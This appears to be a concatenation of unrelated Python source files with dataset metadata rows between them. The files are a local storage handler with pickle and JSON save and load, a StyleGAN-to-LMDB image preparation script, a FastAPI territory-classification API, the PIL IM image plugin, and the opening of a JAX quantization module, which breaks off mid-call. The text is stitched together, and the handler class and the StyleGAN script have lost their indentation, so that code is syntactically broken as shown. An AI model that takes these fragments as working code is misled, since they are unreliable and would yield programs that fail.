raise DofError('LocalHandler.load_as_binary(): handler is not ' +
'open.')
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if not isfile(_location):
raise DofError('LocalHandler.load_as_binary(): tried to ' +
'load binary from non-existing file "{}".'
.format(_location))
with open(_location, 'rb') as instream:
result = instream.read()
return result
def load_as_instance(self, location : str,
is_relative : bool = True) -> any:
"""
Load data as instance
=====================
Parameters
----------
location : str
Location to load from.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
any
Loaded data as an instance.
Raises
------
DofError
If the handler is not yet or no longer open.
DofError
If the target file doesn't exist.
"""
if not self.__is_open:
raise DofError('LocalHandler.load_as_instance(): handler is not ' +
'open.')
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if not isfile(_location):
raise DofError('LocalHandler.load_as_instance(): tried to ' +
'load instance from non-existing file "{}".'
.format(_location))
with open(_location, 'rb') as instream:
result = pickle.load(instream)
return result
def load_as_json(self, location : str, is_relative : bool = True) -> any:
"""
Load data as JSON data
======================
Parameters
----------
location : str
Location to load from.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
any
Loaded data parsed from JSON.
Raises
------
DofError
If the handler is not yet or no longer open.
DofError
If the target file doesn't exist.
"""
if not self.__is_open:
raise DofError('LocalHandler.load_as_json(): handler is not open.')
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if not isfile(_location):
raise DofError('LocalHandler.load_as_json(): tried to load JSON ' +
'from non-existing file "{}".'.format(_location))
with open(_location, 'r', encoding=self.__encoding) as instream:
result = json.load(instream)
return result
def load_as_text(self, location : str, is_relative : bool = True) -> list:
"""
Load data as text
=================
Parameters
----------
location : str
Location to load from.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Returns
-------
list[str]
Loaded data as a list of lines.
Raises
------
DofError
If the handler is not yet or no longer open.
DofError
If the target file doesn't exist.
"""
if not self.__is_open:
raise DofError('LocalHandler.load_as_text(): handler is not open.')
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if not isfile(_location):
raise DofError('LocalHandler.load_as_text(): tried to load text ' +
'from non-existing file "{}".'.format(_location))
with open(_location, 'r', encoding=self.__encoding) as instream:
result = instream.readlines()
return result
def open(self):
"""
Open the connection with the storage
====================================
"""
self.__is_open = True
def save_as_binary(self, data : any, location : str,
is_relative : bool = True):
"""
Save data as binary
===================
Parameters
----------
data : any
Data to save in the form true binary data.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Raises
------
DofError
When the handler is not open.
"""
if self.__is_open:
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
if hasattr(data, 'to_binary') or isinstance(data, bytearray):
if hasattr(data, 'to_binary'):
to_write = data.to_binary()
else:
to_write = data
with open(_location, 'wb') as outstream:
outstream.write(to_write)
else:
with open(_location, 'wb') as outstream:
pickle.dump(data, outstream)
else:
raise DofError('LocalHandler.save_as_binary(): handler is not ' +
'open.')
def save_as_instance(self, data : any, location : str,
is_relative : bool = True):
"""
Save data as instance
=====================
Parameters
----------
data : any
Data to save in the form a python instance.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Raises
------
DofError
When the handler is not open.
"""
if self.__is_open:
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
with open(_location, 'wb') as outstream:
pickle.dump(data, outstream)
else:
raise DofError('LocalHandler.save_as_instance(): handler is not ' +
'open.')
def save_as_json(self, data : any, location : str,
is_relative : bool = True):
"""
Save data as JSON data
======================
Parameters
----------
data : any
Data to save in the form JSON.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Raises
------
DofError
When the handler is not open.
"""
if self.__is_open:
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
with open(_location, 'w', encoding=self.__encoding) as outstream:
json.dump(data, outstream)
else:
raise DofError('LocalHandler.save_as_json(): handler is not ' +
'open.')
def save_as_text(self, data : any, location : str,
is_relative : bool = True):
"""
Save data as text
=================
Parameters
----------
data : str | list
Data to save as text. If a list is given, its elements are
treated as lines of text.
location : str
Location to save to.
is_relative : bool, optional (True if omitted)
Whether to treat location string as relative or absolute location.
Relative location means that the value will be added to a base path
or base url or something like those.
Raises
------
DofError
When the handler is not open.
"""
if self.__is_open:
if isinstance(data, list):
_output = '\n'.join([str(row) for row in data])
else:
_output = data
if is_relative:
_location = join(self.__base_path, location)
else:
_location = location
with open(_location, 'w', encoding=self.__encoding) as outstream:
outstream.write(_output)
else:
raise DofError('LocalHandler.save_as_text(): handler is not open.')
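# --- Illustrative only: typical LocalHandler round trip ----------------------
# This sketch is not part of the original module; the base path and file name
# are made-up examples. The handler has to be opened before use and closed
# afterwards, otherwise the save/load calls raise DofError.
def _local_handler_demo():
    handler = LocalHandler(base_path='./data', encoding='utf8')
    handler.open()
    try:
        handler.save_as_json({'answer': 42}, 'example.json')
        return handler.load_as_json('example.json')
    finally:
        handler.close()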
if __name__ == '__main__':
pass
| 30.446786
| 80
| 0.516543
|
da16d21fe4c494063f096fb8f1bcada9ba7b8285
| 1,972
|
py
|
Python
|
scripts/gan/stylegan/prepare_data.py
|
xdeng7/gluon-cv
|
4ae90c0157d3b29caee68371afe73c06b132fc7c
|
[
"Apache-2.0"
] | 1
|
2020-04-30T03:37:13.000Z
|
2020-04-30T03:37:13.000Z
|
scripts/gan/stylegan/prepare_data.py
|
xdeng7/gluon-cv
|
4ae90c0157d3b29caee68371afe73c06b132fc7c
|
[
"Apache-2.0"
] | null | null | null |
scripts/gan/stylegan/prepare_data.py
|
xdeng7/gluon-cv
|
4ae90c0157d3b29caee68371afe73c06b132fc7c
|
[
"Apache-2.0"
] | null | null | null |
import argparse
from io import BytesIO
import multiprocessing
from functools import partial
from PIL import Image
import lmdb
from tqdm import tqdm
import mxnet.ndarray as nd
from mxnet.gluon.data.vision.datasets import ImageFolderDataset
def resize_and_convert(img, size, quality=100):
img = img.resize((size, size))  # PIL's Image.resize() expects a (width, height) tuple
# img = trans_fn.center_crop(img, size)
buffer = BytesIO()
img.save(buffer, format='jpeg', quality=quality)
val = buffer.getvalue()
return val
def resize_multiple(img, sizes=(8, 16, 32, 64, 128, 256, 512, 1024), quality=100):
imgs = []
for size in sizes:
imgs.append(resize_and_convert(img, size, quality))
return imgs
def resize_worker(img_file, sizes):
i, file = img_file
img = Image.open(file)
img = img.convert('RGB')
out = resize_multiple(img, sizes=sizes)
return i, out
def prepare(transaction, dataset, n_worker, sizes=(8, 16, 32, 64, 128, 256, 512, 1024)):
resize_fn = partial(resize_worker, sizes=sizes)
files = sorted(dataset.items, key=lambda x: x[0])
files = [(i, file) for i, (file, label) in enumerate(files)]
total = 0
with multiprocessing.Pool(n_worker) as pool:
for i, imgs in tqdm(pool.imap_unordered(resize_fn, files)):
for size, img in zip(sizes, imgs):
key = f'{size}-{str(i).zfill(5)}'.encode('utf-8')
transaction.put(key, img)
total += 1
transaction.put('length'.encode('utf-8'), str(total).encode('utf-8'))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--out', type=str)
parser.add_argument('--n_worker', type=int, default=8)
parser.add_argument('--path', type=str)
args = parser.parse_args()
imgset = ImageFolderDataset(args.path)
with lmdb.open(args.out, map_size=1024 ** 4, readahead=False) as env:
with env.begin(write=True) as txn:
prepare(txn, imgset, args.n_worker)
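# Illustrative only (not part of the original script): reading one image back
# from the LMDB written by prepare(). The path, size and index are made-up
# examples; keys follow the f'{size}-{index:05d}' scheme used above.
def read_one_image(lmdb_path, size=256, index=0):
    with lmdb.open(lmdb_path, readonly=True, lock=False) as env:
        with env.begin(write=False) as txn:
            key = f'{size}-{str(index).zfill(5)}'.encode('utf-8')
            data = txn.get(key)
    return Image.open(BytesIO(data))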
| 26.648649
| 88
| 0.656187
|
e42e8675b1f2ac3c4052bd21bf7356c67741e6ec
| 4,863
|
py
|
Python
|
directory/territories/api.py
|
hyzyla/directory.org.ua
|
f47ccc42b566cbdd30d735da8b47e5e7426ccf7b
|
[
"MIT"
] | null | null | null |
directory/territories/api.py
|
hyzyla/directory.org.ua
|
f47ccc42b566cbdd30d735da8b47e5e7426ccf7b
|
[
"MIT"
] | null | null | null |
directory/territories/api.py
|
hyzyla/directory.org.ua
|
f47ccc42b566cbdd30d735da8b47e5e7426ccf7b
|
[
"MIT"
] | null | null | null |
from http import HTTPStatus
from fastapi import Depends, HTTPException, Request
from sqlalchemy.orm import Session
from directory.lib.db import db_dependency
from directory.lib.router import APIRouter
from directory.lib.settings import settings
from directory.territories import db
from directory.territories.schemas import (
GetKATOTTGListResponse,
KATOTTG,
GetKATOTTGListParams,
GetKOATUUListResponse,
GetKOATUUGListParams,
GetKATOTTGListLegacyResponse,
)
from directory.tokens import utils as tokens
router = APIRouter(
prefix="/api",
responses={
200: {"description": "Успішна відповідь"},
422: {"description": "Декілька або один параметр запиту містить помилку"},
500: {"description": "Невідома помилка серверу"},
},
)
_KATOTTG_TAG = "КАТОТТГ"
_KOATUU_TAG = "КОАТУУ"
@router.get(
"/katottg",
summary="Список КАТОТТГ",
tags=[_KATOTTG_TAG],
response_model=GetKATOTTGListResponse,
)
def get_katottg_list(
# input parameters
params: GetKATOTTGListParams = Depends(),
# dependencies
session: Session = Depends(db_dependency),
) -> GetKATOTTGListResponse:
katottg = db.get_katottg_list(
session=session,
code=params.code,
name=params.name,
level=params.level,
parent_id=params.parent,
category=params.category,
limit=params.limit,
offset=params.offset,
)
has_previous = params.page != 1
has_next = len(katottg) == params.page_size + 1
return GetKATOTTGListResponse(
has_next=has_next,
has_previous=has_previous,
page=params.page,
results=katottg,
)
@router.get(
"/katottg/{code}",
summary="Отримати дані по КАТОТТГ",
tags=[_KATOTTG_TAG],
response_model=KATOTTG,
responses={404: {"description": "Територіальну одиницю не знайдено"}},
)
def get_katottg_detail(code: str, session: Session = Depends(db_dependency)):
code = code.upper()
katottg = db.get_katottg(session=session, code=code)
if not katottg:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND,
detail=f"Територіальну одиницю не знайдено: {code}",
)
return katottg
@router.get(
"/koatuu",
summary="Список КОАТУУ",
tags=[_KOATUU_TAG],
response_model=GetKOATUUListResponse,
)
def get_koatuu_list( # input parameters
params: GetKOATUUGListParams = Depends(GetKOATUUGListParams),
# dependencies
session: Session = Depends(db_dependency),
) -> GetKOATUUListResponse:
koatuu = db.get_koatuu_list(
session=session,
code=params.code,
name=params.name,
category=params.category,
katottg_code=params.code,
katottg_name=params.name,
katottg_category=params.katottg_category,
limit=params.limit,
offset=params.offset,
)
has_previous = params.page != 1
has_next = len(koatuu) == params.page_size + 1
return GetKOATUUListResponse(
has_next=has_next,
has_previous=has_previous,
page=params.page,
results=koatuu,
)
@router.get(
"/koatuu/{code}",
summary="Отримати дані по КОАТУУ",
tags=[_KOATUU_TAG],
responses={404: {"description": "Територіальну одиницю не знайдено"}},
)
def get_koatuu_detail(code: str, session: Session = Depends(db_dependency)):
code = code.upper()
koatuu = db.get_koatuu(session=session, code=code)
if not koatuu:
raise HTTPException(
status_code=HTTPStatus.NOT_FOUND,
detail=f"Територіальну одиницю не знайдено: {code}",
)
return koatuu
@router.get(
"/territories",
summary="Список КАТОТТГ",
deprecated=True,
tags=[_KATOTTG_TAG],
response_model=GetKATOTTGListLegacyResponse,
)
def get_territory_list(
request: Request,
# input parameters
params: GetKATOTTGListParams = Depends(GetKATOTTGListParams),
# dependencies
session: Session = Depends(db_dependency),
) -> GetKATOTTGListLegacyResponse:
page = get_katottg_list(params=params, session=session)
page_size = len(page.results)
count = page_size + 1 if page.has_next else page_size
base_url = f"{settings.SERVER_ORIGIN}/api/territories"
next_page = f"{base_url}?page={page.page + 1}" if page.has_next else None
previous_page = f"{base_url}?page={page.page - 1}" if page.has_previous else None
return GetKATOTTGListLegacyResponse(
results=page.results,
count=count,
next=next_page,
previous=previous_page,
)
@router.get(
"/territories/{code}",
summary="Отримати дані по КАТОТТГ",
deprecated=True,
tags=[_KATOTTG_TAG],
response_model=KATOTTG,
)
def get_territory_details(code: str, session: Session = Depends(db_dependency)):
return get_katottg_detail(code, session=session)
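# Illustrative only (not part of the original module): the real project
# presumably creates the FastAPI application elsewhere; this sketch just shows
# how the router defined above could be mounted.
def _create_example_app():
    from fastapi import FastAPI  # local import keeps the sketch self-contained
    app = FastAPI(title="directory.org.ua API (example)")
    app.include_router(router)
    return app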
| 27.167598
| 85
| 0.68394
|
c6a0afe1522df50deaab3d1163084434e16a12b7
| 91
|
py
|
Python
|
rubin_sim/maf/metricBundles/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
rubin_sim/maf/metricBundles/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
rubin_sim/maf/metricBundles/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
from .metricBundle import *
from .metricBundleGroup import *
from .moMetricBundle import *
| 22.75
| 32
| 0.802198
|
38b3f46f4879ed53cb36ad28b86d9bf221c6e80e
| 10,158
|
py
|
Python
|
Pillow-master/src/PIL/ImImagePlugin.py
|
mingyuyng/DCGAN-tensorflow-master
|
975e968880ceb8b03a9502f75d141ed10532b861
|
[
"MIT"
] | null | null | null |
Pillow-master/src/PIL/ImImagePlugin.py
|
mingyuyng/DCGAN-tensorflow-master
|
975e968880ceb8b03a9502f75d141ed10532b861
|
[
"MIT"
] | null | null | null |
Pillow-master/src/PIL/ImImagePlugin.py
|
mingyuyng/DCGAN-tensorflow-master
|
975e968880ceb8b03a9502f75d141ed10532b861
|
[
"MIT"
] | null | null | null |
#
# The Python Imaging Library.
# $Id$
#
# IFUNC IM file handling for PIL
#
# history:
# 1995-09-01 fl Created.
# 1997-01-03 fl Save palette images
# 1997-01-08 fl Added sequence support
# 1997-01-23 fl Added P and RGB save support
# 1997-05-31 fl Read floating point images
# 1997-06-22 fl Save floating point images
# 1997-08-27 fl Read and save 1-bit images
# 1998-06-25 fl Added support for RGB+LUT images
# 1998-07-02 fl Added support for YCC images
# 1998-07-15 fl Renamed offset attribute to avoid name clash
# 1998-12-29 fl Added I;16 support
# 2001-02-17 fl Use 're' instead of 'regex' (Python 2.1) (0.7)
# 2003-09-26 fl Added LA/PA support
#
# Copyright (c) 1997-2003 by Secret Labs AB.
# Copyright (c) 1995-2001 by Fredrik Lundh.
#
# See the README file for information on usage and redistribution.
#
import re
from . import Image, ImageFile, ImagePalette
from ._binary import i8
__version__ = "0.7"
# --------------------------------------------------------------------
# Standard tags
COMMENT = "Comment"
DATE = "Date"
EQUIPMENT = "Digitalization equipment"
FRAMES = "File size (no of images)"
LUT = "Lut"
NAME = "Name"
SCALE = "Scale (x,y)"
SIZE = "Image size (x*y)"
MODE = "Image type"
TAGS = {COMMENT: 0, DATE: 0, EQUIPMENT: 0, FRAMES: 0, LUT: 0, NAME: 0,
SCALE: 0, SIZE: 0, MODE: 0}
OPEN = {
# ifunc93/p3cfunc formats
"0 1 image": ("1", "1"),
"L 1 image": ("1", "1"),
"Greyscale image": ("L", "L"),
"Grayscale image": ("L", "L"),
"RGB image": ("RGB", "RGB;L"),
"RLB image": ("RGB", "RLB"),
"RYB image": ("RGB", "RLB"),
"B1 image": ("1", "1"),
"B2 image": ("P", "P;2"),
"B4 image": ("P", "P;4"),
"X 24 image": ("RGB", "RGB"),
"L 32 S image": ("I", "I;32"),
"L 32 F image": ("F", "F;32"),
# old p3cfunc formats
"RGB3 image": ("RGB", "RGB;T"),
"RYB3 image": ("RGB", "RYB;T"),
# extensions
"LA image": ("LA", "LA;L"),
"RGBA image": ("RGBA", "RGBA;L"),
"RGBX image": ("RGBX", "RGBX;L"),
"CMYK image": ("CMYK", "CMYK;L"),
"YCC image": ("YCbCr", "YCbCr;L"),
}
# ifunc95 extensions
for i in ["8", "8S", "16", "16S", "32", "32F"]:
OPEN["L %s image" % i] = ("F", "F;%s" % i)
OPEN["L*%s image" % i] = ("F", "F;%s" % i)
for i in ["16", "16L", "16B"]:
OPEN["L %s image" % i] = ("I;%s" % i, "I;%s" % i)
OPEN["L*%s image" % i] = ("I;%s" % i, "I;%s" % i)
for i in ["32S"]:
OPEN["L %s image" % i] = ("I", "I;%s" % i)
OPEN["L*%s image" % i] = ("I", "I;%s" % i)
for i in range(2, 33):
OPEN["L*%s image" % i] = ("F", "F;%s" % i)
# --------------------------------------------------------------------
# Read IM directory
split = re.compile(br"^([A-Za-z][^:]*):[ \t]*(.*)[ \t]*$")
def number(s):
try:
return int(s)
except ValueError:
return float(s)
##
# Image plugin for the IFUNC IM file format.
class ImImageFile(ImageFile.ImageFile):
format = "IM"
format_description = "IFUNC Image Memory"
_close_exclusive_fp_after_loading = False
def _open(self):
# Quick rejection: if there's not an LF among the first
# 100 bytes, this is (probably) not a text header.
if b"\n" not in self.fp.read(100):
raise SyntaxError("not an IM file")
self.fp.seek(0)
n = 0
# Default values
self.info[MODE] = "L"
self.info[SIZE] = (512, 512)
self.info[FRAMES] = 1
self.rawmode = "L"
while True:
s = self.fp.read(1)
# Some versions of IFUNC uses \n\r instead of \r\n...
if s == b"\r":
continue
if not s or s == b'\0' or s == b'\x1A':
break
# FIXME: this may read whole file if not a text file
s = s + self.fp.readline()
if len(s) > 100:
raise SyntaxError("not an IM file")
if s[-2:] == b'\r\n':
s = s[:-2]
elif s[-1:] == b'\n':
s = s[:-1]
try:
m = split.match(s)
except re.error:
raise SyntaxError("not an IM file")
if m:
k, v = m.group(1, 2)
# Don't know if this is the correct encoding,
# but a decent guess (I guess)
k = k.decode('latin-1', 'replace')
v = v.decode('latin-1', 'replace')
# Convert value as appropriate
if k in [FRAMES, SCALE, SIZE]:
v = v.replace("*", ",")
v = tuple(map(number, v.split(",")))
if len(v) == 1:
v = v[0]
elif k == MODE and v in OPEN:
v, self.rawmode = OPEN[v]
# Add to dictionary. Note that COMMENT tags are
# combined into a list of strings.
if k == COMMENT:
if k in self.info:
self.info[k].append(v)
else:
self.info[k] = [v]
else:
self.info[k] = v
if k in TAGS:
n += 1
else:
raise SyntaxError("Syntax error in IM header: " +
s.decode('ascii', 'replace'))
if not n:
raise SyntaxError("Not an IM file")
# Basic attributes
self._size = self.info[SIZE]
self.mode = self.info[MODE]
# Skip forward to start of image data
while s and s[0:1] != b'\x1A':
s = self.fp.read(1)
if not s:
raise SyntaxError("File truncated")
if LUT in self.info:
# convert lookup table to palette or lut attribute
palette = self.fp.read(768)
greyscale = 1 # greyscale palette
linear = 1 # linear greyscale palette
for i in range(256):
if palette[i] == palette[i+256] == palette[i+512]:
if i8(palette[i]) != i:
linear = 0
else:
greyscale = 0
if self.mode == "L" or self.mode == "LA":
if greyscale:
if not linear:
self.lut = [i8(c) for c in palette[:256]]
else:
if self.mode == "L":
self.mode = self.rawmode = "P"
elif self.mode == "LA":
self.mode = self.rawmode = "PA"
self.palette = ImagePalette.raw("RGB;L", palette)
elif self.mode == "RGB":
if not greyscale or not linear:
self.lut = [i8(c) for c in palette]
self.frame = 0
self.__offset = offs = self.fp.tell()
self.__fp = self.fp # FIXME: hack
if self.rawmode[:2] == "F;":
# ifunc95 formats
try:
# use bit decoder (if necessary)
bits = int(self.rawmode[2:])
if bits not in [8, 16, 32]:
self.tile = [("bit", (0, 0)+self.size, offs,
(bits, 8, 3, 0, -1))]
return
except ValueError:
pass
if self.rawmode in ["RGB;T", "RYB;T"]:
# Old LabEye/3PC files. Would be very surprised if anyone
# ever stumbled upon such a file ;-)
size = self.size[0] * self.size[1]
self.tile = [("raw", (0, 0)+self.size, offs, ("G", 0, -1)),
("raw", (0, 0)+self.size, offs+size, ("R", 0, -1)),
("raw", (0, 0)+self.size, offs+2*size, ("B", 0, -1))]
else:
# LabEye/IFUNC files
self.tile = [("raw", (0, 0)+self.size, offs,
(self.rawmode, 0, -1))]
@property
def n_frames(self):
return self.info[FRAMES]
@property
def is_animated(self):
return self.info[FRAMES] > 1
def seek(self, frame):
if not self._seek_check(frame):
return
self.frame = frame
if self.mode == "1":
bits = 1
else:
bits = 8 * len(self.mode)
size = ((self.size[0] * bits + 7) // 8) * self.size[1]
offs = self.__offset + frame * size
self.fp = self.__fp
self.tile = [("raw", (0, 0)+self.size, offs, (self.rawmode, 0, -1))]
def tell(self):
return self.frame
#
# --------------------------------------------------------------------
# Save IM files
SAVE = {
# mode: (im type, raw mode)
"1": ("0 1", "1"),
"L": ("Greyscale", "L"),
"LA": ("LA", "LA;L"),
"P": ("Greyscale", "P"),
"PA": ("LA", "PA;L"),
"I": ("L 32S", "I;32S"),
"I;16": ("L 16", "I;16"),
"I;16L": ("L 16L", "I;16L"),
"I;16B": ("L 16B", "I;16B"),
"F": ("L 32F", "F;32F"),
"RGB": ("RGB", "RGB;L"),
"RGBA": ("RGBA", "RGBA;L"),
"RGBX": ("RGBX", "RGBX;L"),
"CMYK": ("CMYK", "CMYK;L"),
"YCbCr": ("YCC", "YCbCr;L")
}
def _save(im, fp, filename):
try:
image_type, rawmode = SAVE[im.mode]
except KeyError:
raise ValueError("Cannot save %s images as IM" % im.mode)
frames = im.encoderinfo.get("frames", 1)
fp.write(("Image type: %s image\r\n" % image_type).encode('ascii'))
if filename:
fp.write(("Name: %s\r\n" % filename).encode('ascii'))
fp.write(("Image size (x*y): %d*%d\r\n" % im.size).encode('ascii'))
fp.write(("File size (no of images): %d\r\n" % frames).encode('ascii'))
if im.mode == "P":
fp.write(b"Lut: 1\r\n")
fp.write(b"\000" * (511-fp.tell()) + b"\032")
if im.mode == "P":
fp.write(im.im.getpalette("RGB", "RGB;L")) # 768 bytes
ImageFile._save(im, fp, [("raw", (0, 0)+im.size, 0, (rawmode, 0, -1))])
#
# --------------------------------------------------------------------
# Registry
Image.register_open(ImImageFile.format, ImImageFile)
Image.register_save(ImImageFile.format, _save)
Image.register_extension(ImImageFile.format, ".im")
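# Illustrative only (not part of the original plugin): once the registrations
# above have run, .im files round-trip through the normal PIL entry points.
# The file name below is a made-up example.
def _im_roundtrip_example(path="example.im"):
    img = Image.new("RGB", (32, 32), color=(255, 0, 0))
    img.save(path)  # dispatched to _save() via the registered ".im" extension
    return Image.open(path).size  # dispatched to ImImageFile via register_open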
| 29.189655
| 78
| 0.463477
|
2bf05924d9a0a3935d926977a0a443dee44702ba
| 49,564
|
py
|
Python
|
aqt/jax/quantization.py
|
mengdong/google-research
|
7f4622f24125f7e9d6d03662aa0fbeb51bd3374a
|
[
"Apache-2.0"
] | null | null | null |
aqt/jax/quantization.py
|
mengdong/google-research
|
7f4622f24125f7e9d6d03662aa0fbeb51bd3374a
|
[
"Apache-2.0"
] | null | null | null |
aqt/jax/quantization.py
|
mengdong/google-research
|
7f4622f24125f7e9d6d03662aa0fbeb51bd3374a
|
[
"Apache-2.0"
] | 1
|
2021-07-22T18:17:16.000Z
|
2021-07-22T18:17:16.000Z
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Abstraction for quantizing neural networks implemented in jax."""
import contextlib
import enum
import functools
import logging
import typing
from typing import Iterable, Optional, Tuple, Union
from absl import flags
import dataclasses
from flax import linen as nn
import jax
from jax import lax
import jax.numpy as jnp
from aqt.jax import compute_cost_utils
from aqt.jax import fp_cast
from aqt.jax import get_bounds
from aqt.jax import primitives
from aqt.jax import shape_utils
from aqt.jax import utils
from aqt.jax.flax import struct as flax_struct
# Global bool to control the use of epsilon in the denominator of the scaling
# methods signed_int_scale and unsigned_int_scale. Epsilon is added to avoid
# division by 0. For testing, one may choose to disable the epsilon by setting
# this global to True.
# As this is a global variable, please modify it only before calling any
# functions that use it.
DISABLE_EPSILON_IN_SCALE_FUN_FOR_TESTING = False
# Dtype for quantization computations: scaling; floor and clip; rescaling. this
# is chosen to optimize performance for a given hardware i.e. for TPU we set it
# to float32. It should be matching native dtype of the hardware's
# 'vector unit'.
SCALE_DTYPE = jnp.float32
dataclass = flax_struct.dataclass if not typing.TYPE_CHECKING else dataclasses.dataclass
# ActBounds can be an Jax array of floats with a shape that is broadcastable to
# the shape of activation tensors.
ActsBoundT = Union[float, jnp.ndarray, get_bounds.GetBounds.Hyper, None]
@dataclass
class _FloatQuant:
"""Parameters for floating-point quantization.
Floating-point quantization refers to degraded floating-point precision
below those natively supported, e.g., bfloat16. This quantization scheme
can either work with, or without scaling (controlled by `is_scaled`).
With scaling, these quantization steps follow,
1. Use the maximum representable floating-point value to determine a scale.
2. This scale is used to "upscale" the argument to the range of the target
floating-point format.
3. The precision of the argument is then degraded through a downcast
operation.
4. Finally the degraded-precision result is "downscaled" by the inverse
scale.
Without scaling, these quantization steps follow,
1. The argument is downcast to the target fp-format with degraded precision.
Of importance in this downcast is the saturating behavior, which is
logically equivalent to clipping by the maximum representable target
value.
"""
@dataclass
class FloatPrec:
"""Parameters for specifying a custom precision floating-point type."""
# The minimum exponent value of the quantized floating-point format.
exp_min: int
# The maximum exponent value of the quantized floating-point format.
exp_max: int
# The number of significand bits (excluding hidden bit) of the quantized
# floating-point format.
sig_bits: int
# Whether or not floating-point fake-quant makes use of scaling.
is_scaled: bool
# Precision specification for floating-point quantization.
fp_spec: FloatPrec
_PrecT = Union[None, int, _FloatQuant] # pylint: disable=invalid-name
class QuantType(str, enum.Enum):
"""Quantization strategy dataclass."""
# fake_quant strategy ensures that quantized values form an arithmetic
# sequence e.g. 0*s ... 255*s for 8-bit positive quantization, for some s.
# it can be implemented as a local op: upscale, floor, clip, downscale.
fake_quant = 'fake_quant'
# fake_quant strategy with quantized inputs/weights type-casted to int.
fake_quant_with_int = 'fake_quant_with_int'
# aqt ensures that MatMul/Conv are in actual integer domain.
# It can't be implemented as a single op.
# Before matmul we have upscale, floor and clip, and after matmul we have
# downscale.
aqt = 'aqt'
def to_jax_type(self):
"""Returns quantized dtype for the corresponding quantization strategy."""
# Currently, this function is used to decide the return type for
# 'QuantOps.to_quantized.' The AQT implementation works by having a
# conversion to an int dtype and then back to a fp dtype happen *within*
# to_quantized, so that Jax backprop works correctly. Thus
# counter-intuitively, we need this to return a fp dtype for 'aqt' since the
# return type for 'to_quantized' overall is fp. TODO(malmaud): As part of
# the refactor of this module, clean this up to eliminate the
# counter-intuitive behavior.
if self.value in ['aqt', 'fake_quant']: # pylint: disable=comparison-with-callable
return SCALE_DTYPE
elif self.value == 'fake_quant_with_int': # pylint: disable=comparison-with-callable
return jnp.int8
else:
raise RuntimeError(f'QuantType {self.value} is unknown.')
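# Quick illustration (not part of the original module) of the mapping that
# to_jax_type() above implements:
#   QuantType.fake_quant.to_jax_type()          -> SCALE_DTYPE (jnp.float32)
#   QuantType.aqt.to_jax_type()                 -> SCALE_DTYPE (the int round
#       trip happens inside to_quantized, see the comment above)
#   QuantType.fake_quant_with_int.to_jax_type() -> jnp.int8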
class QuantOps:
"""Class for quantizing and dequantizing weights and activations."""
# Redefined here as nested class attributes to avoid forward-references.
FloatQuant = _FloatQuant # pylint: disable=invalid-name
PrecT = _PrecT # pylint: disable=invalid-name
@dataclass
class WeightParams:
"""Parameters for weight quantization."""
prec: _PrecT # expected precision for weight quantization.
# enable all available values during quantization
half_shift: bool
# Axis along which to quantize weights (the non-feature axis).
axis: Optional[Iterable[int]]
# expected scale shape for weights quantization. Defaults to None.
expected_scale_shape: Union[None, int, Tuple[int, Ellipsis]] = None
@dataclass
class ActHParams:
"""Parameters for activation quantization."""
# Inheriting from 'str' and making the enums have string values lets us
# conveniently serialize this class to JSON without a custom JSON encoder.
class InputDistribution(str, enum.Enum):
symmetric = 'symmetric'
positive = 'positive'
input_distribution: InputDistribution
# float means fixed bound. '-1' means no quantization.
bounds: ActsBoundT
prec: _PrecT
half_shift: bool
def __init__(self, #
*,
prec,
scale, symmetric,
bounds, half_shift):
"""Default constructor, use of named constructors is strongly encoraged.
Args:
prec: precision for the QuantOps
scale: scaling factor to scale the input to quantized precision range
symmetric: whether the input to quantize is symmetric
bounds: Optional. The clipping bounds used for calculating scale factors.
half_shift: Symmetric quantization with all available values enabled
"""
self._prec = prec
self._half_shift = half_shift
if scale is None:
self._scale = None
else:
self._scale = scale.astype(SCALE_DTYPE)
self._symmetric = symmetric
# Storing bounds is useful for two reasons: one is debugging, since it
# makes it easy to see how a QuantOps instance came up with its scale factor.
# Two is that right now, we use a bounds of '-1' as a special value meaning
# to 'not quantize'. See comment on the 'should_quantize' method for more
# details.
self._bounds = bounds
@classmethod
def create_symmetric_fp(
cls,
*,
bounds,
fp_quant,
):
"""Create QuantOps for symmetric clipping to floating-point bounds.
Args:
bounds: The upper (and absolute lower) bound to clip the inputs.
fp_quant: quantization floating-point specification of the target format.
Returns:
QuantOps for quantizing/dequantizing signed activations.
"""
if bounds is None:
if fp_quant.is_scaled:
raise ValueError(
'bounds can only be None if fp_quant.is_scaled is False.')
return cls(
prec=fp_quant,
scale=None,
symmetric=True,
bounds=None,
